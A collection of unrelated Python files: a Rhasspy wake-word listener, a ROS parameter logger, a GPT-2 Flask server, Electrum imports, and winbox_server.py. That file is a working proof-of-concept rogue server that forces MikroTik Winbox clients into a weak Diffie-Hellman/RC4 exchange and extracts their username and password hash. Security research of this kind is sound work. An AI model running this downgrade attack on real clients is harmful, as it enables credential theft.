self.preload: bool = False
self.receivers: List[RhasspyActor] = []
self.recorder: Optional[RhasspyActor] = None
self.sensitivities = []
self.wake_proc = None
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.library_path = self.profile.read_path(
self.profile.get(
"wake.porcupine.library_path", "porcupine/libpv_porcupine.so"
)
)
self.model_path = self.profile.read_path(
self.profile.get(
"wake.porcupine.model_path", "porcupine/porcupine_params.pv"
)
)
self.keyword_paths = [
Path(self.profile.read_path(p))
for p in self.profile.get(
"wake.porcupine.keyword_path", "porcupine/porcupine.ppn"
).split(",")
]
self.sensitivities = [
float(s)
for s in str(self.profile.get("wake.porcupine.sensitivity", "0.5")).split(
","
)
]
self.preload = self.config.get("preload", False)
if self.preload:
try:
self.load_handle()
except Exception:
self._logger.exception("loading wake handle")
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
if isinstance(message, ListenForWakeWord):
try:
self.load_handle()
self.receivers.append(message.receiver or sender)
self.transition("listening")
if message.record:
self.send(self.recorder, StartStreaming(self.myAddress))
except Exception:
self._logger.exception("loading wake handle")
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, AudioData):
self.audio_buffer += message.data
num_chunks = len(self.audio_buffer) // self.chunk_size
if num_chunks > 0:
assert self.handle is not None
for _ in range(num_chunks):
chunk = self.audio_buffer[: self.chunk_size]
unpacked_chunk = struct.unpack_from(self.chunk_format, chunk)
self.audio_buffer = self.audio_buffer[self.chunk_size :]
# Process chunk
keyword_index = self.handle.process(unpacked_chunk)
if keyword_index:
if len(self.keyword_paths) == 1:
keyword_index = 0
wakeword_name = str(keyword_index)
if keyword_index < len(self.keyword_paths):
wakeword_name = self.keyword_paths[keyword_index].stem
# Pass downstream to receivers
self._logger.debug("Hotword detected (%s)", keyword_index)
result = WakeWordDetected(wakeword_name)
for receiver in self.receivers:
self.send(receiver, result)
elif isinstance(message, WakeWordDetected):
# Pass downstream to receivers
self._logger.debug("Hotword detected (%s)", message.name)
for receiver in self.receivers:
self.send(receiver, message)
elif isinstance(message, WakeWordNotDetected):
# Pass downstream to receivers
for receiver in self.receivers:
self.send(receiver, message)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if len(self.receivers) == 0:
if message.record:
self.send(self.recorder, StopStreaming(self.myAddress))
if self.handle is not None:
self.handle.delete()
self.handle = None
self.transition("started")
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
def load_handle(self):
"""Load porcupine library."""
if self.handle is None:
for kw_path in self.keyword_paths:
assert kw_path.is_file(), f"Missing {kw_path}"
from porcupine import Porcupine
self.handle = Porcupine(
self.library_path,
self.model_path,
keyword_file_paths=[str(p) for p in self.keyword_paths],
sensitivities=self.sensitivities,
)
# 16-bit
self.chunk_size = self.handle.frame_length * 2
self.chunk_format = "h" * self.handle.frame_length
self._logger.debug(
"Loaded porcupine (keyword=%s). Expecting sample rate=%s, frame length=%s",
self.keyword_paths,
self.handle.sample_rate,
self.handle.frame_length,
)
# -----------------------------------------------------------------------------
# Command Wake Listener
# -----------------------------------------------------------------------------
class CommandWakeListener(RhasspyActor):
"""Command-line based wake word listener"""
def __init__(self):
RhasspyActor.__init__(self)
self.receivers: List[RhasspyActor] = []
self.wake_proc = None
self.command: List[str] = []
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
program = os.path.expandvars(self.profile.get("wake.command.program"))
arguments = [
os.path.expandvars(str(a))
for a in self.profile.get("wake.command.arguments", [])
]
self.command = [program] + arguments
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
if isinstance(message, ListenForWakeWord):
self.receivers.append(message.receiver or sender)
self.wake_proc = subprocess.Popen(self.command, stdout=subprocess.PIPE)
def post_result() -> None:
# STDOUT -> text
try:
out, _ = self.wake_proc.communicate()
wakeword_id = out.decode().strip()
except Exception:
wakeword_id = ""
self._logger.exception("post_result")
# Actor will forward
if len(wakeword_id) > 0:
self.send(self.myAddress, WakeWordDetected(wakeword_id))
else:
self.send(self.myAddress, WakeWordNotDetected(wakeword_id))
self.transition("listening")
# Wait for program in a separate thread
threading.Thread(target=post_result, daemon=True).start()
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, WakeWordDetected):
# Pass downstream to receivers
self._logger.debug("Hotword detected (%s)", message.name)
for receiver in self.receivers:
self.send(receiver, message)
elif isinstance(message, WakeWordNotDetected):
# Pass downstream to receivers
for receiver in self.receivers:
self.send(receiver, message)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if len(self.receivers) == 0:
if self.wake_proc is not None:
self.wake_proc.terminate()
self.transition("started")
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
|
rosparam_capture.py | #!/usr/bin/python3
#******************************************************************************
#
#"Distribution A: Approved for public release; distribution unlimited. OPSEC #4046"
#
#PROJECT: DDR
#
# PACKAGE :
# ORIGINAL AUTHOR :
# MODIFIED DATE :
# MODIFIED BY :
# REVISION :
#
# Copyright (c) 2020 DCS Corporation
#
# Unlimited Rights assigned to the U.S. Government
#
# This material may be reproduced by or for the U.S Government pursuant
# to the copyright license under the clause at DFARS 252.227-7013. This
# notice must appear in all copies of this file and its derivatives.
#******************************************************************************
#
#Copyright (c) 2019-2020 U.S. Federal Government (in countries where recognized)
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to use,
#copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
#Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
#EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
#MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
#DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
#ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
#DEALINGS IN THE SOFTWARE.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from collections import deque
import threading
import datetime
import time
import rospy
import rosbag
from rosbag.bag import ROSBagException
from std_msgs.msg import String
## Documentation for RosparamCapture class
#
# Class collects all rosparams at startup, and all changes to the
# rosparams during runtime. When a capture occurs, it determines
# which rosparams were active during the capture and writes all the
# rosparams, theier start and end times and their values to a file
# in the capture folder.
class RosparamCapture():
## The constructor.
def __init__(self):
rospy.init_node("rosparam_capture")
## @var self.captures_queue
# a member variable - a queue of ddr capture paths
self.captures_queue = deque()
## @var self.capture_start_time
# a member variable - the start time of the capture being
# processed
self.capture_start_time = 0.0
## @var self.capture_end_time
# a member variable - the end time of the capture being
# processed
self.capture_end_time = 0.0
## @var self.capture_path
# a member variable - the path to the current capture being
# processed
self.capture_path = ""
## @var self.param_names
# a member variable - a list of rosparams on the parameter server
self.param_names = rospy.get_param_names()
## @var self.param_dict
# a member variable - master dictionary of rosparams, values and times.
self.param_dict = {}
## @var self.param_server_dict
# a member variable - dictionary of rosparams and values received
# from the parameter server. This holds the latest values and will
# get updated into self.param_dict
self.param_server_dict = {}
print("start param setup!")
time.sleep(5)
print("sleep1!")
self.get_dict_from_param_server()
time.sleep(10)
print("sleep2!")
self.initialize_dictionary()
time.sleep(5)
print("sleep3!")
thread1 = threading.Thread(target=self.insert_param_vals)
thread1.start()
time.sleep(5)
print("sleep4")
thread2 = threading.Thread(target=self.process_queue)
thread2.start()
print("rosparam setup complete! safe to create captures")
rospy.Subscriber("/ddr/ros_connections", String,
self.ros_connections_callback)
## Documentation for the flatten_dict function
#
# Recursive function that flattens a nested dictionary with a '/'
# between levels
def flatten_dict(self, dic, separator='/', prefix=""):
return {prefix + separator + k if prefix else k : v
for kk, vv in dic.items()
for k, v in self.flatten_dict(vv, separator, kk).items()
} if isinstance(dic, dict) else {prefix : dic}
## Documentation for initialize_dictionary method
#
# Method initializes the self.param_dict member variable using the list
# of all rosparams collected from the parameter server where each rosparam
# is a key in the dictionary and its values are the time when we start
# tracking rosparams and the current starting value of the rosparam.
# This method performs some paring of the data, stripping '/n' from
# rosparam values and deleting the rosparam /robot_model/robot_description
# from the dictionary of rosparams tracked.
def initialize_dictionary(self):
self.param_dict = dict.fromkeys(self.param_names)
# Remove this ROSParam from dictionary and param_names list
# This param value is a .xml file
if "/robot_model/robot_description" in self.param_dict:
del self.param_dict["/robot_model/robot_description"]
self.param_names.remove("/robot_model/robot_description")
unformatted_time = rospy.get_time()
for param_name in self.param_names:
try:
param_val = self.flattened_dict[param_name]
except KeyError:
print("rosparam not found: ", param_name)
print("if you see this you have a networking problem")
print("I can't get your param values, restart roscore")
if isinstance(param_val, str):
if param_val.endswith('\n'):
param_val = param_val.strip('\n')
val_pair = [unformatted_time, param_val]
self.param_dict[param_name] = [val_pair]
## Documentation for get_dict_from_param_server method
#
# Method pings the parameter server for all of the most recent rosparam
# values, which are returned in the form of a nested dictionary. After
# retrieving, the dictionary keys are formatted by first removing all
# '/' from the key names and then adding back a single '/' at the head
# of the name and then flattens the nested dictionary.
def get_dict_from_param_server(self):
self.param_server_dict = rospy.get_param('/')
for param in self.param_server_dict:
new_key = param.strip('/')
new_key = '/' + new_key
old_key = param
self.param_server_dict[new_key] =\
self.param_server_dict.pop(old_key)
self.flattened_dict = self.flatten_dict(self.param_server_dict)
## Documentation for insert_param_vals method
#
# The dictionary is designed to have a 2D list of values for each key with
# the following format:
# {'key': [[start_time, 'value'],
# [end_time, 'value'],
# [start_time, new_val],
# [end_time, new_val]]}
#
# Method continuously polls the parameter server looking for rosparam
# changes comparing the newly retrieved values to those stored in
# self.param_dict. If no new value is found, the end_time gets updated to
# the current time. If a new value is found, a new set of values is added
# to the dictionary.
def insert_param_vals(self):
# slowing down did not reduce cpu utilization
#rate = rospy.Rate(0.2)
while not rospy.is_shutdown():
self.get_dict_from_param_server()
unformatted_time = rospy.get_time()
format_time = datetime.datetime.utcfromtimestamp\
(unformatted_time).strftime('%H:%M:%S.2%f')
for param_name in self.param_names:
# Next two lines of code needs to be deleted. This is just for
# debugging to show how quickly updates are occurring
#if param_name == "/topicXML":
#print("TOPIC NAME: ", param_name, " Time: ", format_time)
#try:
param_val = self.flattened_dict[param_name]
# except KeyError:
# print("2yikes this boi gone: ", param_name)
# print("better luck next time kiddo")
# print("if you see this you have a networking problem")
# print("I can't get your param values")
if isinstance(param_val, str):
if param_val.endswith('\n'):
param_val = param_val.strip('\n')
val_pair = [unformatted_time, param_val]
vals = self.param_dict.get(param_name)
num_rows = len(vals)
if num_rows < 2:
#add a new list row to the key
self.param_dict[param_name].append(val_pair)
elif num_rows >= 2:
try:
begin_param = vals[-2][1]
end_param = param_val
if begin_param == end_param:
#update the end time to the current time
vals[-1][0] = unformatted_time
self.param_dict.update(param_name=vals)
else:
self.param_dict[param_name].append(val_pair)
except KeyError:
print(param_name + " not found")
#rate.sleep()
## Documentation for ros_connection_callback method
#
# Method is the callback subscribed to the /ddr/ros_connections topic.
# Every time /ddr/ros_connections publishes a new capture has occurred,
# a capture path is added to a queue for processing
def ros_connections_callback(self, msg):
capture_path = str(msg.data)
#print("CALLBACK FOR " + capture_path)
self.captures_queue.append(capture_path)
## Documentation for process_queue method
#
# Method to initiate processing of all captures in the queue. Method calls
# self.collect_capture_begin_end_times of the capture
def process_queue(self):
while not rospy.is_shutdown():
if len(self.captures_queue) > 0:
try:
self.capture_path = self.captures_queue.pop()
self.collect_capture_begin_end_times(self.capture_path)
except IndexError:
print("Queue index out of range: ",
str(len(self.captures_queue)) + " " +
self.capture_path)
continue
## Documentation for collect_capture_begin_end_times method
#
# Method takes the path of the current capture being worked on and collects
# the start and end times of the capture from the bag files in the capture
# folder and sets the member variables self.capture_start_time and
# self.Capture_end_time. After collecting the capture start and end times,
# the method calls the method query_and_write()
def collect_capture_begin_end_times(self, capture_path):
for bag_file in os.listdir(capture_path):
if bag_file.endswith('.bag'):
bag = rosbag.Bag(os.path.join(capture_path, bag_file))
try:
start_time = bag.get_start_time()
end_time = bag.get_end_time()
if start_time == 0.0:
continue
if self.capture_start_time == 0.0 or \
start_time < self.capture_start_time:
self.capture_start_time = start_time
if end_time > self.capture_end_time:
self.capture_end_time = end_time
except ROSBagException:
print(bag_file + " is empty")
self.query_and_write()
self.capture_start_time = 0.0
self.capture_end_time = 0.0
## Documentation for query_and_write method
#
# Method creates and opens a new file in the capture folder. It gets the
# self.param_dict key's values and queries these values to determine the
# active rosparam value(s) during the capture based on the capture start
# and end times. It then writes the dictionary keys, values and start and
# end times for each rosparam value which was active during the capture to
# a table in the file.
# This method calls the write_header method, which writes the capture
# start and stop times to the file and sets up the table.
# This method calls the write_values method, which writes the rosparam
# start, end, param name and value(s) to the markdown table.
# Note, this table is best viewed using a markdown reader.
def query_and_write(self):
capture_name = os.path.basename(self.capture_path)
fout = open(self.capture_path + "/" + capture_name +\
"_rosparam_report.md", 'a')
self.write_header(fout, capture_name)
for param in self.param_names:
dict_vals = self.param_dict.get(param)
for i in range(0, len(dict_vals), 2):
param_start_time = datetime.datetime.utcfromtimestamp\
(dict_vals[i][0]).strftime('%H:%M:%S.2%f')
param_end_time = datetime.datetime.utcfromtimestamp\
(dict_vals[i+1][0]).strftime('%H:%M:%S.2%f')
if dict_vals[i][0] >= self.capture_start_time and\
dict_vals[i+1][0] <= self.capture_end_time:
self.write_values(fout, param_start_time, param_end_time,
param, str(dict_vals[i][1]))
elif dict_vals[i][0] <= self.capture_start_time and\
dict_vals[i+1][0] >= self.capture_start_time:
self.write_values(fout, param_start_time, param_end_time,
param, str(dict_vals[i][1]))
elif dict_vals[i][0] <= self.capture_end_time and\
dict_vals[i+1][0] >= self.capture_end_time:
self.write_values(fout, param_start_time, param_end_time,
param, str(dict_vals[i][1]))
else:
print("dict_vals: " + param_start_time + " " +
param_end_time + param + str(dict_vals[i][1]) +
" are outside the capture window")
print("ROSParam report for " + capture_name + " has been generated")
fout.close()
## Documentation for write_header method
#
# Method writes to the output file, the capture name, the start and end
# times of the capture and sets up the markdown table.
# This method is called by the query_and_write method
def write_header(self, fout, capture_name):
format_cap_start_time = datetime.datetime.utcfromtimestamp\
(self.capture_start_time).strftime('%b %d, %Y %H:%M:%S.%f')
format_cap_end_time = datetime.datetime.utcfromtimestamp\
(self.capture_end_time).strftime('%b %d, %Y %H:%M:%S.%f')
fout.write("## Capture Name: " + capture_name + "\n")
fout.write("\n")
fout.write("#### Capture Start: " + format_cap_start_time + '\n')
fout.write("#### Capture End: " + format_cap_end_time + '\n')
fout.write("#### Rosparams\n")
fout.write("| Start Time | End Time | ROSParam | Value |\n")
fout.write("| --- | --- | --- | --- |\n")
## Documentation for the write_values method
#
# Method takes the output file, the rosparam start time, end time, the
# param and it's value and writes to the output file.
# This method is called by the query_and_write method.
@classmethod
def write_values(cls, fout, start_time, end_time, ros_param, value):
fout.write("|" + start_time + "|" + end_time + "|" +
ros_param + "|" + value + "|\n")
def main():
RosparamCapture()
rospy.spin()
## Driver Script
if __name__ == "__main__":
main()
|
winbox_server.py | import random
import threading
import socket
import sys
import time
##
# This file implements the Winbox server's key exchange and encryption mechanism
# for Winbox before 6.43. The key exchange is Diffie Hellman using a 1984 bit
# non-standard prime and the encryption is a custom RC4 drop-3072 using a 124
# byte session key.
#
# This server won't respond to the initial ECSRP-5 message from the client. When
# that happens, the client will then switch to the DH implementation.
##
##
# Obj: RC4
#
# An implementation of the RC4 logic used by MikroTik's Winbox on versions
# before 6.43. This is an RC4 drop-3072 with various non-standard mixing. The
# expected key is 0x78 bytes and is half of a session key generated / exchanged
# via Diffie Hellman key exchange.
##
class RC4:
# Standard RC4 drop-3072 initialization except for two things:
# 1. the value of j, after initializing S, is carried over to future computations
# 2. the value 'k' is introduced. While not used in the init function itself,
# this variable will be used to mix in previous computations in the
# "block crypt" function. I'm not sure if this is from some published
# variant of RC4 but I do wonder if it can help an attacker understand
# the stream state based on known plaintext?
def __init__(self, key):
# init the sbox
self.S = list(range(0x100))
j = 0
for i in range(0x100):
j = (j + key[i % len(key)] + self.S[i]) & 0xff
t = self.S[i]
self.S[i] = self.S[j]
self.S[j] = t
self.i = 0
self.j = j
self.k = 0
# "drop" 3072 of key stream
for _ in range(0xc00):
self.gen()
# Standard RC4 generation. *Only* used by init
def gen(self):
i = self.i = (self.i + 1) & 255
j = self.j = (self.j + self.S[i]) & 255
t = self.S[i]
self.S[i] = self.S[j]
self.S[j] = t
return self.S[(self.S[i] + self.S[j]) & 255]
def send_block_crypt(self, data, padding, client = False):
retval_data = bytearray(data)
data_length = len(retval_data)
counter = 0
j = self.j
while (counter < data_length):
i = (self.i + counter + 1) & 255
j = (j + self.k + self.S[i]) & 255
t = self.S[i]
self.S[i] = self.S[j]
self.S[j] = t
retval_data[counter] = data[counter] ^ self.S[(self.S[i] + self.S[j]) & 255]
if client == True:
self.k = retval_data[counter]
else:
self.k = data[counter]
counter = counter + 1
j = self.k + j
for i in range(256):
j = (j + self.S[i] & 0xff)
t = self.S[i]
self.S[i] = self.S[j]
self.S[j] = t
retval_padding = bytearray(10)
counter = 0
while (counter < 10):
i = (counter + (self.i + data_length + 1)) & 255
j = (j + self.S[i] & 0xff)
t = self.S[i]
self.S[i] = self.S[j]
self.S[j] = t
retval_padding[counter] = padding[counter] ^ self.S[(self.S[i] + self.S[j]) & 255]
counter = counter + 1
self.i = data_length + 10
self.j = j
if client == False:
self.k = 0
return retval_padding + retval_data
def downgrade_attack(sock):
# Currently just listening for messages to 5 (DH) and 6 (ECSRP)
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] == 5):
print('No need to downgrade. Received DH request.')
elif (handler[0] == 6):
# ignore this packet. This should trigger a DH request
ignore = sock.recv(message_length[0])
# the client should send a DH key exchange request now
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] != 5):
print('Client didn\'t request a DH key exchange: %x' % handler[0])
sock.close()
return
else:
print('Client didn\'t request a key exchange: %x' % handler[0])
sock.close()
return
if (message_length[0] != 0xf8):
print('[-] Client sent unexpected amount of DH public data: %x' % message_length[0])
sock.close()
return
client_public_bytes = sock.recv(message_length[0])
client_public = int.from_bytes(client_public_bytes, byteorder='big', signed=False)
print('[+] Received client\'s public component:')
print('\t%x' % client_public)
print('[+] Generating a secret:')
local_secret = random.getrandbits(128)
print('\t%x' % local_secret)
print('[+] Computing server\'s public component: ')
shared_prime = int("B7BA220582B41518F8526BFE0F624DE926106DFB4F719DD93BC4309D49045A4175DB1C58C4D7843D16E766226894B31793B13E789FFD2CF3331267476031B30D2F995237F0B59A33A4F972FB1A618556EF8F332E7A3C366B24FDB39B42B0670B1F90A3D2E8C22E78DDA51A16B46A8E693BB9AED29E8509361BD438E76B1C235FCDD11E70A2B8C0EA15A9DFEA03278F39C12520A0BC36F21694546154C82E065B2EFFD7DDEBD5C1E588F9916F87D80E91303C9435A20E91DD1C9360DEF6A2B0D54FDA44049C0E8CC8A8049CBB1432C6E322D603F41DAA60028C40D78A8653F659C4FFC3F5D8A4E01A5C08E4B04B52388E9EF4A5E24569D15F", 16)
shared_base = 5
server_public = pow(shared_base, local_secret, shared_prime)
print('\t%x' % server_public)
print('[+] Sending server\'s public component to client.')
sock.sendall(b'\xf8' + b'\x05' + server_public.to_bytes(0xf8, byteorder='big'))
print('[+] Computing session key:')
shared_secret = pow(client_public, local_secret, shared_prime)
print('\t%x' % shared_secret)
mega_key = shared_secret.to_bytes(0xf8, byteorder='big')
send_key = mega_key[0x7c:]
recv_key = mega_key[:0x7c]
print('[+] Seeding RC4 engines')
crypto_out = RC4(send_key)
crypto_in = RC4(recv_key)
print('[+] Waiting for salt request')
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] != 5):
print('[-] Client sent unexpected handler: %x' % handler[0])
sock.close()
return
if (message_length[0] != 0x38):
print('[-] Client request is an unexpected length: %x' % message_length[0])
sock.close()
return
print('[+] Received salt request')
encrypted_salt_request = sock.recv(message_length[0])
payload = encrypted_salt_request[12:]
padding = encrypted_salt_request[2:12]
print('[+] Decrypting the request')
indata = crypto_in.send_block_crypt(payload, padding, True);
print('[+] Sending salt response')
# Our response actually provides a 0 length salt. Which the client seems
# to happily accept.
padding = b'\x00'*10
salt_response = (b'M2\x01\x00\xff\x88\x02\x00\x00\x00\x00\x00' +
b'\x0b\x00\x00\x00\x02\x00\xff\x88\x02\x00\x0d\x00\x00\x00\x04' +
b'\x00\x00\x00\x03\x00\xff\x09\x02\x06\x00\xff\x09\x02\x09\x00' +
b'\x00\x31\x00')
outdata = crypto_out.send_block_crypt(salt_response, padding);
sock.sendall(b'\x39' + b'\x05' + b'\x00' + b'\x2d' + outdata)
print('[+] Waiting for a login request')
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] != 5):
print('[-] Client sent unexpected handler: %x' % handler[0])
sock.close()
return
print('[+] Received a login request')
encrypted_salt_request = sock.recv(message_length[0])
payload = encrypted_salt_request[12:]
padding = encrypted_salt_request[2:12]
print('[+] Decrypting the request')
indata = crypto_in.send_block_crypt(payload, padding, True);
print('[+] Extracting username and hashed password:')
# this logic isn't perfect since we aren't actually parsing the M2 message.
username_offset = indata.find(b'\x01\x00\x00\x21')
hash_offset = indata.find(b'\x0a\x00\x00\x31\x11\x00')
username_end = username_offset + 5 + indata[username_offset + 4]
username = indata[username_offset + 5:username_end].decode('utf-8')
print('\t%s' % username)
hash_end = hash_offset + 5 + 1 + 16
md5hash = indata[hash_offset + 6:hash_end]
print('\t', end='')
for i in md5hash:
print('{:02x}'.format(i), end='')
print('')
sock.close()
return
if __name__ == '__main__':
# bind to 8291 on all interfaces
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('0.0.0.0', 8291))
server.listen(5)
print('[+] Listening on 0.0.0.0:8291')
while True:
client_sock, address = server.accept()
print('[+] Accepted connection from %s:%s' % (address[0], address[1]))
client_handler = threading.Thread(target=downgrade_attack, args=(client_sock,))
client_handler.start()
|
server.py | import numpy as np
import os
import io
# import for server
from flask import Flask, render_template, request, Response, send_file, jsonify
from queue import Queue, Empty
import threading
import time
# import for model
from transformers import AutoTokenizer, AutoModelWithLMHead, top_k_top_p_filtering
from torch.nn import functional as F
import torch
import time
# flask server
app = Flask(__name__)
# limit input file size under 2MB
# model loading
tokenizer = AutoTokenizer.from_pretrained("pranavpsv/gpt2-genre-story-generator")
model = AutoModelWithLMHead.from_pretrained("pranavpsv/gpt2-genre-story-generator", return_dict=True)
# change cpu to gpu so that model can use gpu (because default type is cpu)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model.to(device)
# request queue setting
requests_queue = Queue()
BATCH_SIZE = 1
CHECK_INTERVAL = 0.1
# static variable
# request handling
def handle_requests_by_batch():
try:
while True:
requests_batch = []
while not (len(requests_batch) >= BATCH_SIZE):
try:
requests_batch.append(requests_queue.get(timeout=CHECK_INTERVAL))
except Empty:
continue
batch_outputs = []
for request in requests_batch:
if len(request["input"]) == 2:
batch_outputs.append(run_short(request["input"][0], request["input"][1]))
elif len(request["input"]) == 3:
batch_outputs.append(run_long(request["input"][0], request["input"][1], request["input"][2]))
for request, output in zip(requests_batch, batch_outputs):
request["output"] = output
except Exception as e:
while not requests_queue.empty():
requests_queue.get()
print(e)
# request processing
threading.Thread(target=handle_requests_by_batch).start()
# run short model
def run_short(prompt, num):
try:
prompt = prompt.strip()
input_ids = tokenizer.encode(prompt, return_tensors='pt')
# input_ids also need to apply gpu device!
input_ids = input_ids.to(device)
# get logits of last hidden state
next_token_logits = model(input_ids).logits[:, -1, :]
# filter
filtered_next_token_logits = top_k_top_p_filtering(next_token_logits, top_k=50, top_p=1.0)
# sample
probs = F.softmax(filtered_next_token_logits, dim=-1)
next_token = torch.multinomial(probs, num_samples=num)
result = {}
for idx, token in enumerate(next_token.tolist()[0]):
result[idx] = tokenizer.decode(token)
return result
except Exception as e:
print(e)
return 500
# run long model
def run_long(prompt, num, length):
try:
prompt = prompt.strip()
input_ids = tokenizer.encode(prompt, return_tensors='pt')
# input_ids also need to apply gpu device!
input_ids = input_ids.to(device)
min_length = len(input_ids.tolist()[0])
length += min_length
sample_outputs = model.generate(input_ids, pad_token_id=50256,
do_sample=True,
max_length=length,
min_length=length,
top_k=40,
num_return_sequences=num)
generated_texts = {}
for i, sample_output in enumerate(sample_outputs):
output = tokenizer.decode(sample_output.tolist()[min_length:], skip_special_tokens=True)
generated_texts[i] = output
return generated_texts
except Exception as e:
print(e)
return 500
# routing
@app.route("/gpt2-story/<types>", methods=['POST'])
def generation(types):
try:
if types != 'short' and types != 'long':
return jsonify({'message' : 'Error! Can not route short or long'}), 400
# only get one request at a time
if requests_queue.qsize() > BATCH_SIZE:
return jsonify({'message' : 'TooManyReqeusts'}), 429
# check image format
try:
args = []
prompt = str(request.form['text'])
num = int(str(request.form['num_samples']))
args.append(prompt)
args.append(num)
if types == 'long':
length = int(str(request.form['length']))
args.append(length)
except Exception:
return jsonify({'message' : 'Error! Can not read args from request'}), 500
# put data to request_queue
req = {'input' : args}
requests_queue.put(req)
# wait output
while 'output' not in req:
time.sleep(CHECK_INTERVAL)
# send output
generated_text = req['output']
if generated_text == 500:
return jsonify({'message': 'Error! An unknown error occurred on the server'}), 500
result = jsonify(generated_text)
return result
except Exception as e:
print(e)
return jsonify({'message': 'Error! Unable to process request'}), 400
@app.route('/healthz')
def health():
return "ok", 200
@app.route('/')
def main():
return "ok", 200
if __name__ == "__main__":
from waitress import serve
serve(app, host='0.0.0.0', port=80) |
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
